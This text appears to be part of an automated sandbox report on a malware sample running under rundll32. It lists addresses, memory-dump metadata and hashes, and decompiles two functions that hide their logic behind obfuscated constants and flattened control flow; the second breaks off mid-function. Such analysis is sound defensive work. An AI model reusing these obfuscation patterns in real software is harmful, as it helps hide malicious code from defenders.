                                                                                                                                    0x002d1402
                                                                                                                                    0x002d140a
                                                                                                                                    0x002d1412
                                                                                                                                    0x002d141a
                                                                                                                                    0x002d1422
                                                                                                                                    0x002d142a
                                                                                                                                    0x002d1432
                                                                                                                                    0x002d143a
                                                                                                                                    0x002d1442
                                                                                                                                    0x002d144a
                                                                                                                                    0x002d1458
                                                                                                                                    0x002d1572
                                                                                                                                    0x00000000
                                                                                                                                    0x002d145e
                                                                                                                                    0x002d145e
                                                                                                                                    0x002d1460
                                                                                                                                    0x002d163b
                                                                                                                                    0x002d163b
                                                                                                                                    0x002d1641
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d1466
                                                                                                                                    0x002d1485
                                                                                                                                    0x002d14bc
                                                                                                                                    0x002d14c3
                                                                                                                                    0x002d14c8
                                                                                                                                    0x002d14d1
                                                                                                                                    0x002d1524
                                                                                                                                    0x002d1536
                                                                                                                                    0x002d1554
                                                                                                                                    0x002d155b
                                                                                                                                    0x002d1560
                                                                                                                                    0x002d1565
                                                                                                                                    0x002d156b
                                                                                                                                    0x00000000
                                                                                                                                    0x002d156b
                                                                                                                                    0x002d1565
                                                                                                                                    0x002d1460
                                                                                                                                    0x002d1651
                                                                                                                                    0x002d1651
                                                                                                                                    0x002d1579
                                                                                                                                    0x002d1587
                                                                                                                                    0x002d158b
                                                                                                                                    0x002d159a
                                                                                                                                    0x002d159b
                                                                                                                                    0x002d15a0
                                                                                                                                    0x002d15a9
                                                                                                                                    0x002d15f0
                                                                                                                                    0x002d15fc
                                                                                                                                    0x002d1605
                                                                                                                                    0x002d160d
                                                                                                                                    0x002d160f
                                                                                                                                    0x002d1613
                                                                                                                                    0x002d1614
                                                                                                                                    0x002d1615
                                                                                                                                    0x002d1616
                                                                                                                                    0x002d1617
                                                                                                                                    0x002d1629
                                                                                                                                    0x002d162d
                                                                                                                                    0x002d162e
                                                                                                                                    0x002d1633
                                                                                                                                    0x002d1636
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Fo$M_o9$[K
                                                                                                                                    • API String ID: 0-3743190696
                                                                                                                                    • Opcode ID: c0ff45edf336e4603ab9c4199ffc18cb6e1be64abb468246e7793c2eec1268a4
                                                                                                                                    • Instruction ID: 94cde3bb40bf9d2fe5355c4998eec6755f4d90603170921c219350ca71284c9a
                                                                                                                                    • Opcode Fuzzy Hash: c0ff45edf336e4603ab9c4199ffc18cb6e1be64abb468246e7793c2eec1268a4
                                                                                                                                    • Instruction Fuzzy Hash: 36121EB14093819FD368CF21C58AA8BBBF1FBC5748F108A1DE59A96260D7B18919CF53
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E002C9DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				intOrPtr _v136;
                                                                                                                                    				char _v160;
                                                                                                                                    				short _v708;
                                                                                                                                    				short _v710;
                                                                                                                                    				char _v712;
                                                                                                                                    				signed int _v756;
                                                                                                                                    				char _v1276;
                                                                                                                                    				char _v1796;
                                                                                                                                    				void* _t278;
                                                                                                                                    				signed int _t306;
                                                                                                                                    				signed int _t310;
                                                                                                                                    				void* _t312;
                                                                                                                                    				intOrPtr _t317;
                                                                                                                                    				void* _t319;
                                                                                                                                    				signed int _t324;
                                                                                                                                    				void* _t327;
                                                                                                                                    				void* _t353;
                                                                                                                                    				signed int _t365;
                                                                                                                                    				signed int _t366;
                                                                                                                                    				signed int _t367;
                                                                                                                                    				signed int _t368;
                                                                                                                                    				signed int _t369;
                                                                                                                                    				signed int _t370;
                                                                                                                                    				void* _t373;
                                                                                                                                    				void* _t374;
                                                                                                                                    
                                                                                                                                    				_t317 = _a12;
                                                                                                                                    				_push(_a24);
                                                                                                                                    				_push(_a20);
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_push(_t317);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t278);
                                                                                                                                    				_v44 = 0x411c30;
                                                                                                                                    				_t374 = _t373 + 0x20;
                                                                                                                                    				_v44 = _v44 ^ 0x3aebcc2b;
                                                                                                                                    				_v44 = _v44 ^ 0x10090153;
                                                                                                                                    				_t319 = 0x338c922;
                                                                                                                                    				_v44 = _v44 ^ 0x2aa3d158;
                                                                                                                                    				_v56 = 0xa7c140;
                                                                                                                                    				_v56 = _v56 >> 1;
                                                                                                                                    				_v56 = _v56 ^ 0xbf613798;
                                                                                                                                    				_v56 = _v56 ^ 0xbf3c535c;
                                                                                                                                    				_v88 = 0xb7ebf9;
                                                                                                                                    				_t365 = 0x52;
                                                                                                                                    				_v88 = _v88 / _t365;
                                                                                                                                    				_v88 = _v88 ^ 0x0004e01e;
                                                                                                                                    				_v112 = 0x1a3e5b;
                                                                                                                                    				_v112 = _v112 + 0xd588;
                                                                                                                                    				_v112 = _v112 ^ 0x0012c9bc;
                                                                                                                                    				_v8 = 0x55b84a;
                                                                                                                                    				_t366 = 0x72;
                                                                                                                                    				_v8 = _v8 * 0x74;
                                                                                                                                    				_v8 = _v8 + 0xffff07de;
                                                                                                                                    				_v8 = _v8 * 0x41;
                                                                                                                                    				_v8 = _v8 ^ 0xdc74eedb;
                                                                                                                                    				_v96 = 0x123c4e;
                                                                                                                                    				_v96 = _v96 + 0x1d06;
                                                                                                                                    				_v96 = _v96 ^ 0x001f978b;
                                                                                                                                    				_v124 = 0x58f8d3;
                                                                                                                                    				_v124 = _v124 * 0x2b;
                                                                                                                                    				_v124 = _v124 ^ 0x0efbe47e;
                                                                                                                                    				_v120 = 0x58d481;
                                                                                                                                    				_v120 = _v120 << 5;
                                                                                                                                    				_v120 = _v120 ^ 0x0b1fdd63;
                                                                                                                                    				_v32 = 0x85548e;
                                                                                                                                    				_v32 = _v32 / _t366;
                                                                                                                                    				_v32 = _v32 * 0x2e;
                                                                                                                                    				_v32 = _v32 ^ 0x0037cfdf;
                                                                                                                                    				_v108 = 0x851b7a;
                                                                                                                                    				_v108 = _v108 | 0xf3ff5f40;
                                                                                                                                    				_v108 = _v108 ^ 0xf3fc1521;
                                                                                                                                    				_v76 = 0x86d28f;
                                                                                                                                    				_v76 = _v76 >> 0xd;
                                                                                                                                    				_v76 = _v76 ^ 0x000a85f2;
                                                                                                                                    				_v48 = 0x8a8988;
                                                                                                                                    				_v48 = _v48 + 0xffff9d54;
                                                                                                                                    				_v48 = _v48 + 0xffffb441;
                                                                                                                                    				_v48 = _v48 ^ 0x008c2bbe;
                                                                                                                                    				_v80 = 0x3fe2a4;
                                                                                                                                    				_v80 = _v80 ^ 0x5e00b743;
                                                                                                                                    				_v80 = _v80 ^ 0x5e39b1b0;
                                                                                                                                    				_v116 = 0x4ea08b;
                                                                                                                                    				_v116 = _v116 + 0xffffca32;
                                                                                                                                    				_v116 = _v116 ^ 0x00427ef9;
                                                                                                                                    				_v104 = 0xba6181;
                                                                                                                                    				_v104 = _v104 + 0xf529;
                                                                                                                                    				_v104 = _v104 ^ 0x00b33727;
                                                                                                                                    				_v52 = 0x1e8210;
                                                                                                                                    				_v52 = _v52 >> 8;
                                                                                                                                    				_v52 = _v52 | 0xffb97487;
                                                                                                                                    				_v52 = _v52 ^ 0xffb16a42;
                                                                                                                                    				_v40 = 0xeabfd3;
                                                                                                                                    				_v40 = _v40 ^ 0x26644279;
                                                                                                                                    				_t367 = 0x3a;
                                                                                                                                    				_v40 = _v40 / _t367;
                                                                                                                                    				_v40 = _v40 ^ 0x00a36ea5;
                                                                                                                                    				_v12 = 0xc9f67b;
                                                                                                                                    				_v12 = _v12 + 0x836b;
                                                                                                                                    				_v12 = _v12 | 0xa1408986;
                                                                                                                                    				_t368 = 0x45;
                                                                                                                                    				_v12 = _v12 * 0x75;
                                                                                                                                    				_v12 = _v12 ^ 0xf1cc1c9a;
                                                                                                                                    				_v36 = 0x1f6921;
                                                                                                                                    				_v36 = _v36 ^ 0x9bf749ed;
                                                                                                                                    				_v36 = _v36 / _t368;
                                                                                                                                    				_v36 = _v36 ^ 0x024ed910;
                                                                                                                                    				_v64 = 0x37ccf2;
                                                                                                                                    				_v64 = _v64 + 0xfffff775;
                                                                                                                                    				_t369 = 0x19;
                                                                                                                                    				_v64 = _v64 * 0x24;
                                                                                                                                    				_v64 = _v64 ^ 0x07d7b77b;
                                                                                                                                    				_v28 = 0x370f8;
                                                                                                                                    				_v28 = _v28 << 0xd;
                                                                                                                                    				_v28 = _v28 + 0x6470;
                                                                                                                                    				_v28 = _v28 >> 1;
                                                                                                                                    				_v28 = _v28 ^ 0x37097055;
                                                                                                                                    				_v20 = 0x84152c;
                                                                                                                                    				_v20 = _v20 * 0x7e;
                                                                                                                                    				_v20 = _v20 / _t369;
                                                                                                                                    				_v20 = _v20 << 0xe;
                                                                                                                                    				_v20 = _v20 ^ 0x6c90d6a3;
                                                                                                                                    				_v60 = 0x687dd9;
                                                                                                                                    				_t370 = 0xc;
                                                                                                                                    				_v60 = _v60 * 0x1d;
                                                                                                                                    				_v60 = _v60 << 7;
                                                                                                                                    				_v60 = _v60 ^ 0xeb212648;
                                                                                                                                    				_v84 = 0xd09924;
                                                                                                                                    				_v84 = _v84 * 0x7c;
                                                                                                                                    				_v84 = _v84 ^ 0x650614c5;
                                                                                                                                    				_v100 = 0x3804f2;
                                                                                                                                    				_v100 = _v100 | 0x9eb8052c;
                                                                                                                                    				_v100 = _v100 ^ 0x9eb506d7;
                                                                                                                                    				_v92 = 0xf492b0;
                                                                                                                                    				_v92 = _v92 + 0xffffc4ae;
                                                                                                                                    				_v92 = _v92 ^ 0x00fafa5e;
                                                                                                                                    				_v16 = 0xd0e41e;
                                                                                                                                    				_v16 = _v16 * 0x3d;
                                                                                                                                    				_v16 = _v16 >> 0xd;
                                                                                                                                    				_v16 = _v16 >> 0xe;
                                                                                                                                    				_v16 = _v16 ^ 0x000dc1c9;
                                                                                                                                    				_v24 = 0x66d2fe;
                                                                                                                                    				_v24 = _v24 / _t370;
                                                                                                                                    				_v24 = _v24 + 0xffffccd2;
                                                                                                                                    				_v24 = _v24 ^ 0x0a93dd72;
                                                                                                                                    				_v24 = _v24 ^ 0x0a9c564f;
                                                                                                                                    				_v72 = 0xbcf4e;
                                                                                                                                    				_v72 = _v72 >> 7;
                                                                                                                                    				_v72 = _v72 ^ 0x000c8ddf;
                                                                                                                                    				_t364 = _v72;
                                                                                                                                    				_v68 = 0x4616df;
                                                                                                                                    				_v68 = _v68 + 0x9c8e;
                                                                                                                                    				_v68 = _v68 + 0xaaef;
                                                                                                                                    				_v68 = _v68 ^ 0x004c065d;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t353 = 0x2e;
                                                                                                                                    					L2:
                                                                                                                                    					while(_t319 != 0x21229d9) {
                                                                                                                                    						if(_t319 == 0x338c922) {
                                                                                                                                    							_v136 = _t317;
                                                                                                                                    							_t319 = 0x9035918;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t319 == 0x5b964d8) {
                                                                                                                                    							__eflags = _v756 & _v44;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								_t306 = _a16( &_v756,  &_v160);
                                                                                                                                    								asm("sbb ecx, ecx");
                                                                                                                                    								_t324 =  ~_t306 & 0x09c7cc54;
                                                                                                                                    								L9:
                                                                                                                                    								_t319 = _t324 + 0x21229d9;
                                                                                                                                    								while(1) {
                                                                                                                                    									L1:
                                                                                                                                    									_t353 = 0x2e;
                                                                                                                                    									goto L2;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							__eflags = _v712 - _t353;
                                                                                                                                    							if(_v712 != _t353) {
                                                                                                                                    								L19:
                                                                                                                                    								__eflags = _a24;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_push(_v104);
                                                                                                                                    									_push(_v116);
                                                                                                                                    									_t312 = E002DDCF7(_v80, 0x2c17a0, __eflags);
                                                                                                                                    									_pop(_t327);
                                                                                                                                    									E002C47CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
                                                                                                                                    									E002C9DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
                                                                                                                                    									_t310 = E002CA8B0(_v100, _t312, _v92);
                                                                                                                                    									_t374 = _t374 + 0x3c;
                                                                                                                                    									_t353 = 0x2e;
                                                                                                                                    								}
                                                                                                                                    								L18:
                                                                                                                                    								_t319 = 0xbd9f62d;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _v710;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								goto L18;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _v710 - _t353;
                                                                                                                                    							if(_v710 != _t353) {
                                                                                                                                    								goto L19;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _v708;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								goto L19;
                                                                                                                                    							}
                                                                                                                                    							goto L18;
                                                                                                                                    						}
                                                                                                                                    						if(_t319 == 0x9035918) {
                                                                                                                                    							_push(_v112);
                                                                                                                                    							_push(_v88);
                                                                                                                                    							E002CA918(_t317, __eflags, _v8, _v96, E002DDCF7(_v56, 0x2c1770, __eflags), _v124,  &_v1796);
                                                                                                                                    							_t374 = _t374 + 0x1c;
                                                                                                                                    							_t310 = E002CA8B0(_v120, _t307, _v32);
                                                                                                                                    							_t319 = 0xb066d4a;
                                                                                                                                    							while(1) {
                                                                                                                                    								L1:
                                                                                                                                    								_t353 = 0x2e;
                                                                                                                                    								goto L2;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						if(_t319 == 0xb066d4a) {
                                                                                                                                    							_t310 = E002C7E00(_v108,  &_v756, _v76, _v48,  &_v1796);
                                                                                                                                    							_t364 = _t310;
                                                                                                                                    							_t374 = _t374 + 0xc;
                                                                                                                                    							__eflags = _t310 - 0xffffffff;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								L25:
                                                                                                                                    								return _t310;
                                                                                                                                    							}
                                                                                                                                    							_t319 = 0x5b964d8;
                                                                                                                                    							goto L1;
                                                                                                                                    						}
                                                                                                                                    						if(_t319 != 0xbd9f62d) {
                                                                                                                                    							L24:
                                                                                                                                    							__eflags = _t319 - 0xa89df2;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							goto L25;
                                                                                                                                    						}
                                                                                                                                    						_t310 = E002C4635(_v16,  &_v756, _t364, _v24);
                                                                                                                                    						asm("sbb ecx, ecx");
                                                                                                                                    						_t324 =  ~_t310 & 0x03a73aff;
                                                                                                                                    						goto L9;
                                                                                                                                    					}
                                                                                                                                    					E002C8ABF(_t364, _v72, _v68);
                                                                                                                                    					_t319 = 0xa89df2;
                                                                                                                                    					_t353 = 0x2e;
                                                                                                                                    					goto L24;
                                                                                                                                    				}
                                                                                                                                    			}
                                                                                                                                    0x002ca14e
                                                                                                                                    0x002ca2f9
                                                                                                                                    0x002ca2f9
                                                                                                                                    0x002ca2ff
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca2ff
                                                                                                                                    0x002ca161
                                                                                                                                    0x002ca16c
                                                                                                                                    0x002ca16e
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca16e
                                                                                                                                    0x002ca2eb
                                                                                                                                    0x002ca2f3
                                                                                                                                    0x002ca2f8
                                                                                                                                    0x00000000
                                                                                                                                    0x002ca2f8

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: H&!$Up7$yBd&
                                                                                                                                    • API String ID: 0-2352930472
                                                                                                                                    • Opcode ID: e890f45a983ad430243ba5b473c4585fbf716412f7b7fe6da148e766f921e43b
                                                                                                                                    • Instruction ID: a4ff0ce35ff9327eb28d697eecee3c051c4f261e4b8e1d17a097455f592ae475
                                                                                                                                    • Opcode Fuzzy Hash: e890f45a983ad430243ba5b473c4585fbf716412f7b7fe6da148e766f921e43b
                                                                                                                                    • Instruction Fuzzy Hash: E9E14371D0021EDBCF28DFA0D98A9EEBBB1FB44318F20825DE516BA260D7B40A55CF41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002D95FA() {
                                                                                                                                    				char _v524;
                                                                                                                                    				signed int _v532;
                                                                                                                                    				intOrPtr _v536;
                                                                                                                                    				intOrPtr _v540;
                                                                                                                                    				intOrPtr _v544;
                                                                                                                                    				intOrPtr _v548;
                                                                                                                                    				intOrPtr _v552;
                                                                                                                                    				intOrPtr _v556;
                                                                                                                                    				intOrPtr _v560;
                                                                                                                                    				char _v564;
                                                                                                                                    				intOrPtr _v568;
                                                                                                                                    				char _v572;
                                                                                                                                    				signed int _v576;
                                                                                                                                    				signed int _v580;
                                                                                                                                    				signed int _v584;
                                                                                                                                    				signed int _v588;
                                                                                                                                    				signed int _v592;
                                                                                                                                    				signed int _v596;
                                                                                                                                    				signed int _v600;
                                                                                                                                    				signed int _v604;
                                                                                                                                    				signed int _v608;
                                                                                                                                    				signed int _v612;
                                                                                                                                    				signed int _v616;
                                                                                                                                    				signed int _v620;
                                                                                                                                    				signed int _v624;
                                                                                                                                    				signed int _v628;
                                                                                                                                    				signed int _v632;
                                                                                                                                    				signed int _v636;
                                                                                                                                    				signed int _v640;
                                                                                                                                    				signed int _v644;
                                                                                                                                    				signed int _v648;
                                                                                                                                    				signed int _v652;
                                                                                                                                    				signed int _v656;
                                                                                                                                    				signed int _v660;
                                                                                                                                    				signed int _v664;
                                                                                                                                    				signed int _v668;
                                                                                                                                    				signed int _v672;
                                                                                                                                    				signed int _v676;
                                                                                                                                    				signed int _v680;
                                                                                                                                    				signed int _v684;
                                                                                                                                    				signed int _v688;
                                                                                                                                    				intOrPtr _t295;
                                                                                                                                    				void* _t297;
                                                                                                                                    				void* _t298;
                                                                                                                                    				intOrPtr _t299;
                                                                                                                                    				signed int _t306;
                                                                                                                                    				void* _t309;
                                                                                                                                    				void* _t310;
                                                                                                                                    				char _t311;
                                                                                                                                    				void* _t317;
                                                                                                                                    				intOrPtr _t334;
                                                                                                                                    				signed int _t341;
                                                                                                                                    				signed int _t342;
                                                                                                                                    				signed int _t343;
                                                                                                                                    				signed int _t344;
                                                                                                                                    				void* _t347;
                                                                                                                                    
                                                                                                                                    				_v668 = 0xe6fb93;
                                                                                                                                    				_v668 = _v668 + 0xffff1eed;
                                                                                                                                    				_t310 = 0xada6804;
                                                                                                                                    				_v668 = _v668 * 0x61;
                                                                                                                                    				_t309 = 0;
                                                                                                                                    				_v668 = _v668 ^ 0xaca28cc6;
                                                                                                                                    				_v668 = _v668 ^ 0xfb928647;
                                                                                                                                    				_v616 = 0x8caf33;
                                                                                                                                    				_t341 = 0x42;
                                                                                                                                    				_v616 = _v616 * 0x25;
                                                                                                                                    				_v616 = _v616 * 0x4f;
                                                                                                                                    				_v616 = _v616 ^ 0x46546a51;
                                                                                                                                    				_v620 = 0x861136;
                                                                                                                                    				_v620 = _v620 | 0x52f06d4d;
                                                                                                                                    				_v620 = _v620 >> 0xf;
                                                                                                                                    				_v620 = _v620 ^ 0x0000a5ef;
                                                                                                                                    				_v628 = 0x4cf396;
                                                                                                                                    				_v628 = _v628 >> 1;
                                                                                                                                    				_v628 = _v628 >> 9;
                                                                                                                                    				_v628 = _v628 ^ 0x0000133c;
                                                                                                                                    				_v684 = 0xc54e58;
                                                                                                                                    				_v684 = _v684 >> 2;
                                                                                                                                    				_v684 = _v684 ^ 0xb8bf25ee;
                                                                                                                                    				_v684 = _v684 >> 2;
                                                                                                                                    				_v684 = _v684 ^ 0x2e259ad3;
                                                                                                                                    				_v592 = 0x68267f;
                                                                                                                                    				_v592 = _v592 + 0xffff39c4;
                                                                                                                                    				_v592 = _v592 ^ 0x006c60f9;
                                                                                                                                    				_v632 = 0xa1d089;
                                                                                                                                    				_v632 = _v632 / _t341;
                                                                                                                                    				_v632 = _v632 ^ 0x52222b14;
                                                                                                                                    				_v632 = _v632 ^ 0x5220bcfc;
                                                                                                                                    				_v608 = 0x39d352;
                                                                                                                                    				_v608 = _v608 | 0x2e7e1ae1;
                                                                                                                                    				_v608 = _v608 ^ 0x576cc274;
                                                                                                                                    				_v608 = _v608 ^ 0x7911cf35;
                                                                                                                                    				_v660 = 0xc26f36;
                                                                                                                                    				_v660 = _v660 ^ 0x9f5dc88a;
                                                                                                                                    				_v660 = _v660 ^ 0xeefda613;
                                                                                                                                    				_t342 = 0x3f;
                                                                                                                                    				_v660 = _v660 / _t342;
                                                                                                                                    				_v660 = _v660 ^ 0x01ce77bb;
                                                                                                                                    				_v624 = 0x334861;
                                                                                                                                    				_v624 = _v624 + 0xffff4b1a;
                                                                                                                                    				_t343 = 0x2a;
                                                                                                                                    				_v624 = _v624 * 0x2f;
                                                                                                                                    				_v624 = _v624 ^ 0x0947e580;
                                                                                                                                    				_v652 = 0xab72b9;
                                                                                                                                    				_v652 = _v652 << 8;
                                                                                                                                    				_v652 = _v652 / _t343;
                                                                                                                                    				_v652 = _v652 ^ 0x0419701b;
                                                                                                                                    				_v688 = 0x507748;
                                                                                                                                    				_v688 = _v688 << 5;
                                                                                                                                    				_v688 = _v688 + 0xffff449a;
                                                                                                                                    				_v688 = _v688 + 0xb858;
                                                                                                                                    				_v688 = _v688 ^ 0x0a0a66f0;
                                                                                                                                    				_v600 = 0x95cabc;
                                                                                                                                    				_v600 = _v600 + 0xffffb185;
                                                                                                                                    				_v600 = _v600 << 9;
                                                                                                                                    				_v600 = _v600 ^ 0x2af43595;
                                                                                                                                    				_v580 = 0x7e3ec7;
                                                                                                                                    				_v580 = _v580 ^ 0x09caac24;
                                                                                                                                    				_v580 = _v580 ^ 0x09b70662;
                                                                                                                                    				_v612 = 0xa526a8;
                                                                                                                                    				_v612 = _v612 | 0x64dab874;
                                                                                                                                    				_v612 = _v612 >> 0xe;
                                                                                                                                    				_v612 = _v612 ^ 0x0006f9eb;
                                                                                                                                    				_v604 = 0xb7de18;
                                                                                                                                    				_t344 = 0x48;
                                                                                                                                    				_v604 = _v604 * 0x79;
                                                                                                                                    				_v604 = _v604 * 0x31;
                                                                                                                                    				_v604 = _v604 ^ 0xa26ee4e9;
                                                                                                                                    				_v640 = 0x553c00;
                                                                                                                                    				_v640 = _v640 + 0xffff4196;
                                                                                                                                    				_v640 = _v640 + 0xffff8daf;
                                                                                                                                    				_v640 = _v640 ^ 0x00577a07;
                                                                                                                                    				_v576 = 0xaac37;
                                                                                                                                    				_v576 = _v576 * 0x77;
                                                                                                                                    				_v576 = _v576 ^ 0x04fc3a71;
                                                                                                                                    				_v676 = 0xb6ce7b;
                                                                                                                                    				_v676 = _v676 >> 1;
                                                                                                                                    				_v676 = _v676 * 0x28;
                                                                                                                                    				_v676 = _v676 >> 0xb;
                                                                                                                                    				_v676 = _v676 ^ 0x000b20b4;
                                                                                                                                    				_v584 = 0x4877b4;
                                                                                                                                    				_v584 = _v584 << 1;
                                                                                                                                    				_v584 = _v584 ^ 0x009148e9;
                                                                                                                                    				_v588 = 0xaf1c90;
                                                                                                                                    				_v588 = _v588 * 0x5b;
                                                                                                                                    				_v588 = _v588 ^ 0x3e3937c6;
                                                                                                                                    				_v644 = 0x150bb3;
                                                                                                                                    				_v644 = _v644 + 0x865c;
                                                                                                                                    				_v644 = _v644 + 0x5404;
                                                                                                                                    				_v644 = _v644 ^ 0x001dce65;
                                                                                                                                    				_v648 = 0xaa3958;
                                                                                                                                    				_v648 = _v648 / _t344;
                                                                                                                                    				_v648 = _v648 >> 0xe;
                                                                                                                                    				_v648 = _v648 ^ 0x000a9525;
                                                                                                                                    				_v596 = 0xdb2add;
                                                                                                                                    				_v596 = _v596 << 0xd;
                                                                                                                                    				_v596 = _v596 ^ 0x65528fd4;
                                                                                                                                    				_v680 = 0xd04d0c;
                                                                                                                                    				_v680 = _v680 << 5;
                                                                                                                                    				_t340 = _v596;
                                                                                                                                    				_v680 = _v680 * 0x55;
                                                                                                                                    				_v680 = _v680 | 0x96843ebb;
                                                                                                                                    				_v680 = _v680 ^ 0xb7be4a39;
                                                                                                                                    				_v656 = 0x2591b4;
                                                                                                                                    				_v656 = _v656 ^ 0x7517a4f1;
                                                                                                                                    				_v656 = _v656 ^ 0xb20365ef;
                                                                                                                                    				_v656 = _v656 + 0xffff4c4f;
                                                                                                                                    				_v656 = _v656 ^ 0xc733773b;
                                                                                                                                    				_v636 = 0xbfc674;
                                                                                                                                    				_v636 = _v636 * 0x1d;
                                                                                                                                    				_v636 = _v636 << 6;
                                                                                                                                    				_v636 = _v636 ^ 0x6e5b8cbc;
                                                                                                                                    				_v664 = 0x3235cc;
                                                                                                                                    				_v664 = _v664 << 1;
                                                                                                                                    				_v664 = _v664 | 0x857b9d7f;
                                                                                                                                    				_v664 = _v664 * 0x28;
                                                                                                                                    				_v664 = _v664 ^ 0xdbf98c50;
                                                                                                                                    				_v672 = 0xb181ad;
                                                                                                                                    				_v672 = _v672 >> 0xa;
                                                                                                                                    				_v672 = _v672 << 2;
                                                                                                                                    				_v672 = _v672 ^ 0xdb7e6d02;
                                                                                                                                    				_v672 = _v672 ^ 0xdb78e9e9;
                                                                                                                                    				do {
                                                                                                                                    					while(_t310 != 0x10c1a7f) {
                                                                                                                                    						if(_t310 == 0x31db0c0) {
                                                                                                                                    							_t311 = _v572;
                                                                                                                                    							_t295 = _v568;
                                                                                                                                    							_push(_t311);
                                                                                                                                    							_v560 = _t295;
                                                                                                                                    							_v552 = _t295;
                                                                                                                                    							_v544 = _t295;
                                                                                                                                    							_v536 = _t295;
                                                                                                                                    							_v564 = _t311;
                                                                                                                                    							_v556 = _t311;
                                                                                                                                    							_v548 = _t311;
                                                                                                                                    							_v540 = _t311;
                                                                                                                                    							_v532 = _v628;
                                                                                                                                    							_t297 = E002C5DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
                                                                                                                                    							_t347 = _t347 + 0x18;
                                                                                                                                    							__eflags = _t297;
                                                                                                                                    							_t309 =  !=  ? 1 : _t309;
                                                                                                                                    							_t310 = 0x48f7cbb;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t310 == 0x461819e) {
                                                                                                                                    								_push(_v660);
                                                                                                                                    								_push(_v608);
                                                                                                                                    								_t298 = E002DDCF7(_v632, 0x2c1000, __eflags);
                                                                                                                                    								_pop(_t317);
                                                                                                                                    								_t299 =  *0x2e3e10; // 0x0
                                                                                                                                    								_t334 =  *0x2e3e10; // 0x0
                                                                                                                                    								E002C47CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
                                                                                                                                    								E002CA8B0(_v612, _t298, _v604);
                                                                                                                                    								_t347 = _t347 + 0x24;
                                                                                                                                    								_t310 = 0xa22489e;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t310 == 0x48f7cbb) {
                                                                                                                                    									E002D1E67(_v656, _v636, _v664, _v672, _t340);
                                                                                                                                    								} else {
                                                                                                                                    									if(_t310 == 0xa22489e) {
